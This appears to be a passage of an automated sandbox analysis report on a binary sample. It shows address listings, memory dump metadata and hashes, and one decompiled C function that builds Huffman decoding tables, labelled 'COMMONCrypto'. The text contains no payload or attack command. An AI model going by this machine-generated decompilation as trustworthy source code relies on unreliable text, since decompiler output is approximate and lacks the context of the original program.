                                                                                                                                                                                                          0x004068b4
                                                                                                                                                                                                          0x004068b6
                                                                                                                                                                                                          0x004068b9
                                                                                                                                                                                                          0x004068be
                                                                                                                                                                                                          0x00406894
                                                                                                                                                                                                          0x00406894
                                                                                                                                                                                                          0x00406899
                                                                                                                                                                                                          0x0040689b
                                                                                                                                                                                                          0x0040689d
                                                                                                                                                                                                          0x004068a2
                                                                                                                                                                                                          0x004068a8
                                                                                                                                                                                                          0x004068ad
                                                                                                                                                                                                          0x004068af
                                                                                                                                                                                                          0x004068af
                                                                                                                                                                                                          0x004068a4
                                                                                                                                                                                                          0x004068a4
                                                                                                                                                                                                          0x004068a4
                                                                                                                                                                                                          0x004068a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004068c0
                                                                                                                                                                                                          0x004068ed
                                                                                                                                                                                                          0x004068f2
                                                                                                                                                                                                          0x004068f4
                                                                                                                                                                                                          0x004068f5
                                                                                                                                                                                                          0x004068f7
                                                                                                                                                                                                          0x004068f8
                                                                                                                                                                                                          0x004068f8
                                                                                                                                                                                                          0x004068f8
                                                                                                                                                                                                          0x00406920
                                                                                                                                                                                                          0x00406925
                                                                                                                                                                                                          0x00406925
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406925
                                                                                                                                                                                                          0x004068be
                                                                                                                                                                                                          0x00406885
                                                                                                                                                                                                          0x00406828
                                                                                                                                                                                                          0x00406828
                                                                                                                                                                                                          0x00406829
                                                                                                                                                                                                          0x00406873
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406873
                                                                                                                                                                                                          0x0040682b
                                                                                                                                                                                                          0x0040682c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406988
                                                                                                                                                                                                          0x00406988
                                                                                                                                                                                                          0x00406988
                                                                                                                                                                                                          0x0040698b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406968
                                                                                                                                                                                                          0x00406968
                                                                                                                                                                                                          0x0040696c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406972
                                                                                                                                                                                                          0x00406972
                                                                                                                                                                                                          0x00406975
                                                                                                                                                                                                          0x00406978
                                                                                                                                                                                                          0x0040697d
                                                                                                                                                                                                          0x0040697f
                                                                                                                                                                                                          0x00406982
                                                                                                                                                                                                          0x00406985
                                                                                                                                                                                                          0x00406985
                                                                                                                                                                                                          0x00406985
                                                                                                                                                                                                          0x0040698d
                                                                                                                                                                                                          0x0040698d
                                                                                                                                                                                                          0x00406990
                                                                                                                                                                                                          0x00406992
                                                                                                                                                                                                          0x00406997
                                                                                                                                                                                                          0x0040699a
                                                                                                                                                                                                          0x0040699c
                                                                                                                                                                                                          0x0040699f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004069a5
                                                                                                                                                                                                          0x004069a5
                                                                                                                                                                                                          0x004069a7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004069ad
                                                                                                                                                                                                          0x004069ad
                                                                                                                                                                                                          0x004069b1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004069b7
                                                                                                                                                                                                          0x004069b7
                                                                                                                                                                                                          0x004069ba
                                                                                                                                                                                                          0x004069bc
                                                                                                                                                                                                          0x00406a5a
                                                                                                                                                                                                          0x00406a5a
                                                                                                                                                                                                          0x00406a5d
                                                                                                                                                                                                          0x00406a5f
                                                                                                                                                                                                          0x00406a5f
                                                                                                                                                                                                          0x00406a62
                                                                                                                                                                                                          0x00406a65
                                                                                                                                                                                                          0x00406a67
                                                                                                                                                                                                          0x00406a69
                                                                                                                                                                                                          0x00406a6b
                                                                                                                                                                                                          0x00406a6b
                                                                                                                                                                                                          0x00406a74
                                                                                                                                                                                                          0x00406a79
                                                                                                                                                                                                          0x00406a7c
                                                                                                                                                                                                          0x00406a7f
                                                                                                                                                                                                          0x00406a82
                                                                                                                                                                                                          0x00406a85
                                                                                                                                                                                                          0x00406a85
                                                                                                                                                                                                          0x00406a85
                                                                                                                                                                                                          0x00406a88
                                                                                                                                                                                                          0x00406a8e
                                                                                                                                                                                                          0x00406a8e
                                                                                                                                                                                                          0x00406a94
                                                                                                                                                                                                          0x00406a94
                                                                                                                                                                                                          0x00406a94
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406a88
                                                                                                                                                                                                          0x004069c2
                                                                                                                                                                                                          0x004069c2
                                                                                                                                                                                                          0x004069c8
                                                                                                                                                                                                          0x004069cb
                                                                                                                                                                                                          0x004069cd
                                                                                                                                                                                                          0x004069f8
                                                                                                                                                                                                          0x004069fb
                                                                                                                                                                                                          0x00406a01
                                                                                                                                                                                                          0x00406a06
                                                                                                                                                                                                          0x00406a0c
                                                                                                                                                                                                          0x00406a12
                                                                                                                                                                                                          0x00406a14
                                                                                                                                                                                                          0x00406a17
                                                                                                                                                                                                          0x00406a20
                                                                                                                                                                                                          0x00406a26
                                                                                                                                                                                                          0x00406a26
                                                                                                                                                                                                          0x00406a19
                                                                                                                                                                                                          0x00406a1b
                                                                                                                                                                                                          0x00406a1d
                                                                                                                                                                                                          0x00406a1d
                                                                                                                                                                                                          0x00406a28
                                                                                                                                                                                                          0x00406a2e
                                                                                                                                                                                                          0x00406a31
                                                                                                                                                                                                          0x00406a33
                                                                                                                                                                                                          0x00406a35
                                                                                                                                                                                                          0x00406a3b
                                                                                                                                                                                                          0x00406a3d
                                                                                                                                                                                                          0x00406a3f
                                                                                                                                                                                                          0x00406a42
                                                                                                                                                                                                          0x00406a4b
                                                                                                                                                                                                          0x00406a4b
                                                                                                                                                                                                          0x00406a4d
                                                                                                                                                                                                          0x00406a44
                                                                                                                                                                                                          0x00406a44
                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                          0x00406a4f
                                                                                                                                                                                                          0x00406a4f
                                                                                                                                                                                                          0x00406a3d
                                                                                                                                                                                                          0x00406a52
                                                                                                                                                                                                          0x00406a54
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406a54
                                                                                                                                                                                                          0x004069cf
                                                                                                                                                                                                          0x004069cf
                                                                                                                                                                                                          0x004069d5
                                                                                                                                                                                                          0x004069db
                                                                                                                                                                                                          0x004069dd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004069df
                                                                                                                                                                                                          0x004069df
                                                                                                                                                                                                          0x004069e1
                                                                                                                                                                                                          0x004069e3
                                                                                                                                                                                                          0x004069e6
                                                                                                                                                                                                          0x004069ed
                                                                                                                                                                                                          0x004069ed
                                                                                                                                                                                                          0x004069ef
                                                                                                                                                                                                          0x004069e8
                                                                                                                                                                                                          0x004069e8
                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                          0x004069f1
                                                                                                                                                                                                          0x004069f3
                                                                                                                                                                                                          0x004069f6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406afa
                                                                                                                                                                                                          0x00406afd
                                                                                                                                                                                                          0x00406b00
                                                                                                                                                                                                          0x00406b06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406cdd
                                                                                                                                                                                                          0x00406ce0
                                                                                                                                                                                                          0x00406ce3
                                                                                                                                                                                                          0x00406ce5
                                                                                                                                                                                                          0x00406ce8
                                                                                                                                                                                                          0x00406cee
                                                                                                                                                                                                          0x00406cf5
                                                                                                                                                                                                          0x00406cf7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bcb
                                                                                                                                                                                                          0x00406bcb
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf3
                                                                                                                                                                                                          0x00406bf5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bd3
                                                                                                                                                                                                          0x00406bd3
                                                                                                                                                                                                          0x00406bd7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bdd
                                                                                                                                                                                                          0x00406bdd
                                                                                                                                                                                                          0x00406be0
                                                                                                                                                                                                          0x00406be3
                                                                                                                                                                                                          0x00406be6
                                                                                                                                                                                                          0x00406be8
                                                                                                                                                                                                          0x00406bea
                                                                                                                                                                                                          0x00406bed
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf0
                                                                                                                                                                                                          0x00406bf7
                                                                                                                                                                                                          0x00406bf7
                                                                                                                                                                                                          0x00406bff
                                                                                                                                                                                                          0x00406c02
                                                                                                                                                                                                          0x00406c08
                                                                                                                                                                                                          0x00406c0b
                                                                                                                                                                                                          0x00406c0f
                                                                                                                                                                                                          0x00406c13
                                                                                                                                                                                                          0x00406c16
                                                                                                                                                                                                          0x00406c19
                                                                                                                                                                                                          0x00406c31
                                                                                                                                                                                                          0x00406c31
                                                                                                                                                                                                          0x00406c34
                                                                                                                                                                                                          0x00406c42
                                                                                                                                                                                                          0x00406c45
                                                                                                                                                                                                          0x00406c36
                                                                                                                                                                                                          0x00406c36
                                                                                                                                                                                                          0x00406c38
                                                                                                                                                                                                          0x00406c3f
                                                                                                                                                                                                          0x00406c3f
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c6e
                                                                                                                                                                                                          0x00406c71
                                                                                                                                                                                                          0x00406c73
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406c4e
                                                                                                                                                                                                          0x00406c4e
                                                                                                                                                                                                          0x00406c52
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                                          0x00406c5b
                                                                                                                                                                                                          0x00406c5e
                                                                                                                                                                                                          0x00406c61
                                                                                                                                                                                                          0x00406c63
                                                                                                                                                                                                          0x00406c65
                                                                                                                                                                                                          0x00406c68
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c6b
                                                                                                                                                                                                          0x00406c75
                                                                                                                                                                                                          0x00406c75
                                                                                                                                                                                                          0x00406c77
                                                                                                                                                                                                          0x00406c79
                                                                                                                                                                                                          0x00406c84
                                                                                                                                                                                                          0x00406c87
                                                                                                                                                                                                          0x00406c8a
                                                                                                                                                                                                          0x00406c8c
                                                                                                                                                                                                          0x00406c8e
                                                                                                                                                                                                          0x00406c90
                                                                                                                                                                                                          0x00406c93
                                                                                                                                                                                                          0x00406c96
                                                                                                                                                                                                          0x00406c9b
                                                                                                                                                                                                          0x00406c9e
                                                                                                                                                                                                          0x00406ca1
                                                                                                                                                                                                          0x00406ca4
                                                                                                                                                                                                          0x00406cab
                                                                                                                                                                                                          0x00406cae
                                                                                                                                                                                                          0x00406cb0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cb6
                                                                                                                                                                                                          0x00406cb6
                                                                                                                                                                                                          0x00406cba
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccb
                                                                                                                                                                                                          0x00406ccd
                                                                                                                                                                                                          0x00406ccd
                                                                                                                                                                                                          0x00406cd1
                                                                                                                                                                                                          0x00406cd1
                                                                                                                                                                                                          0x00406cd1
                                                                                                                                                                                                          0x00406cd3
                                                                                                                                                                                                          0x00406cd4
                                                                                                                                                                                                          0x00406cd7
                                                                                                                                                                                                          0x00406cd7
                                                                                                                                                                                                          0x00406cd7
                                                                                                                                                                                                          0x00406cda
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cda
                                                                                                                                                                                                          0x00406cbc
                                                                                                                                                                                                          0x00406cbc
                                                                                                                                                                                                          0x00406cbf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cc5
                                                                                                                                                                                                          0x00406cc5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406cc5
                                                                                                                                                                                                          0x00406c1b
                                                                                                                                                                                                          0x00406c1b
                                                                                                                                                                                                          0x00406c1d
                                                                                                                                                                                                          0x00406c1f
                                                                                                                                                                                                          0x00406c22
                                                                                                                                                                                                          0x00406c25
                                                                                                                                                                                                          0x00406c29
                                                                                                                                                                                                          0x00406c29
                                                                                                                                                                                                          0x00406cfd
                                                                                                                                                                                                          0x00406cfd
                                                                                                                                                                                                          0x00406d00
                                                                                                                                                                                                          0x00406d07
                                                                                                                                                                                                          0x00406d0b
                                                                                                                                                                                                          0x00406d0d
                                                                                                                                                                                                          0x00406d10
                                                                                                                                                                                                          0x00406d13
                                                                                                                                                                                                          0x00406d18
                                                                                                                                                                                                          0x00406d1b
                                                                                                                                                                                                          0x00406d1d
                                                                                                                                                                                                          0x00406d1e
                                                                                                                                                                                                          0x00406d21
                                                                                                                                                                                                          0x00406d2c
                                                                                                                                                                                                          0x00406d2f
                                                                                                                                                                                                          0x00406d46
                                                                                                                                                                                                          0x00406d4b
                                                                                                                                                                                                          0x00406d52
                                                                                                                                                                                                          0x00406d57
                                                                                                                                                                                                          0x00406d5b
                                                                                                                                                                                                          0x00406d5d
                                                                                                                                                                                                          0x00406d5d
                                                                                                                                                                                                          0x00406d5d
                                                                                                                                                                                                          0x00406d60
                                                                                                                                                                                                          0x00406d62
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406d68
                                                                                                                                                                                                          0x00406d68
                                                                                                                                                                                                          0x00406d6c
                                                                                                                                                                                                          0x00406d77
                                                                                                                                                                                                          0x00406d8a
                                                                                                                                                                                                          0x00406d8f
                                                                                                                                                                                                          0x00406d94
                                                                                                                                                                                                          0x00406d96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406d9c
                                                                                                                                                                                                          0x00406d9c
                                                                                                                                                                                                          0x00406d9f
                                                                                                                                                                                                          0x00406da1
                                                                                                                                                                                                          0x00406daf
                                                                                                                                                                                                          0x00406daf
                                                                                                                                                                                                          0x00406db2
                                                                                                                                                                                                          0x00406db2
                                                                                                                                                                                                          0x00406db5
                                                                                                                                                                                                          0x00406db8
                                                                                                                                                                                                          0x00406dbb
                                                                                                                                                                                                          0x00406dbe
                                                                                                                                                                                                          0x00406dc1
                                                                                                                                                                                                          0x00406dc4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406dc4
                                                                                                                                                                                                          0x00406da3
                                                                                                                                                                                                          0x00406da3
                                                                                                                                                                                                          0x00406da9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406da9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407148
                                                                                                                                                                                                          0x00407148
                                                                                                                                                                                                          0x0040714e
                                                                                                                                                                                                          0x00407154
                                                                                                                                                                                                          0x00407159
                                                                                                                                                                                                          0x0040715f
                                                                                                                                                                                                          0x00407165
                                                                                                                                                                                                          0x00407167
                                                                                                                                                                                                          0x0040716a
                                                                                                                                                                                                          0x00407173
                                                                                                                                                                                                          0x00407179
                                                                                                                                                                                                          0x00407179
                                                                                                                                                                                                          0x0040716c
                                                                                                                                                                                                          0x0040716e
                                                                                                                                                                                                          0x00407170
                                                                                                                                                                                                          0x00407170
                                                                                                                                                                                                          0x0040717b
                                                                                                                                                                                                          0x0040717d
                                                                                                                                                                                                          0x00407180
                                                                                                                                                                                                          0x004071bb
                                                                                                                                                                                                          0x004071bb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00407182
                                                                                                                                                                                                          0x00407182
                                                                                                                                                                                                          0x00407182
                                                                                                                                                                                                          0x00407188
                                                                                                                                                                                                          0x0040718b
                                                                                                                                                                                                          0x0040718d
                                                                                                                                                                                                          0x004071c2
                                                                                                                                                                                                          0x004071c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004071c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040718d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004067cc
                                                                                                                                                                                                          0x0040719a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040719a
                                                                                                                                                                                                          0x00406bae
                                                                                                                                                                                                          0x00406bb0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bb2
                                                                                                                                                                                                          0x00406bb2
                                                                                                                                                                                                          0x00406bb5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406bb5
                                                                                                                                                                                                          0x00406afa
                                                                                                                                                                                                          0x00406abb
                                                                                                                                                                                                          0x0040719f
                                                                                                                                                                                                          0x004071a2
                                                                                                                                                                                                          0x004071a4
                                                                                                                                                                                                          0x004071ad
                                                                                                                                                                                                          0x004071b3
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                                                                                                                                          • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407272, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                                                                                          0x0040727d
                                                                                                                                                                                                          0x00407285
                                                                                                                                                                                                          0x00407289
                                                                                                                                                                                                          0x0040728b
                                                                                                                                                                                                          0x0040728e
                                                                                                                                                                                                          0x00407290
                                                                                                                                                                                                          0x00407290
                                                                                                                                                                                                          0x00407292
                                                                                                                                                                                                          0x00407299
                                                                                                                                                                                                          0x0040729b
                                                                                                                                                                                                          0x0040729b
                                                                                                                                                                                                          0x004072a1
                                                                                                                                                                                                          0x004072b6
                                                                                                                                                                                                          0x004072be
                                                                                                                                                                                                          0x004072c0
                                                                                                                                                                                                          0x004072c2
                                                                                                                                                                                                          0x004072c5
                                                                                                                                                                                                          0x004072c6
                                                                                                                                                                                                          0x004072c6
                                                                                                                                                                                                          0x004072cc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004072ce
                                                                                                                                                                                                          0x004072d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004072d1
                                                                                                                                                                                                          0x004072d5
                                                                                                                                                                                                          0x004072d8
                                                                                                                                                                                                          0x004072da
                                                                                                                                                                                                          0x004072da
                                                                                                                                                                                                          0x004072dd
                                                                                                                                                                                                          0x004072e3
                                                                                                                                                                                                          0x004072e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
